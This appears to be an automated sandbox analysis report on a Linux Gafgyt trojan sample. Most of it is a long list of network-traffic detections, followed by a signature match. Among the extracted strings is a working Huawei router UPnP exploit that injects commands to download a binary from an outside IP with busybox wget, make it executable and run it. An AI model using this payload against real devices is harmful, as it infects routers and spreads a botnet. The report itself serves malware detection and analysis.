            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
            Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
            Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
            Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
            Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
            Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
            Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
            Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
            Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
            Source: unknownNetwork traffic detected: HTTP traffic on port 48174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38254
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
            Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
            Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
            Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
            Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
            Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
            Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
            Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
            Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
            Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
            Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
            Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41872
            Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
            Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
            Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
            Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
            Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
            Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
            Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
            Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
            Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
            Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
            Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
            Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
            Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
            Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
            Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
            Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
            Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
            Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38140
            Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
            Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
            Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
            Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
            Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
            Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
            Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41782
            Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
            Source: unknownNetwork traffic detected: HTTP traffic on port 33524 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
            Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
            Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
            Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
            Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
            Source: unknownNetwork traffic detected: HTTP traffic on port 41074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
            Source: unknownNetwork traffic detected: HTTP traffic on port 43760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
            Source: unknownNetwork traffic detected: HTTP traffic on port 33536 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
            Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47666 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
            Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
            Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
            Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
            Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38198
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
            Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
            Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
            Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38180
            Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38184
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38186
            Source: unknownNetwork traffic detected: HTTP traffic on port 36502 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
            Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
            Source: unknownNetwork traffic detected: HTTP traffic on port 46808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
            Source: unknownNetwork traffic detected: HTTP traffic on port 60614 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
            Source: unknownNetwork traffic detected: HTTP traffic on port 39276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34382 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34370 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
            Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
            Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
            Source: unknownNetwork traffic detected: HTTP traffic on port 47750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
            Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
            Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
            Source: unknownNetwork traffic detected: HTTP traffic on port 36658 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
            Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53918
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
            Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41936

            System Summary

            barindex
            Source: skyljne.mpsl.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5530.1.00007f633c400000.00007f633c42a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: skyljne.mpsl.elf PID: 5530, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: busybox
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
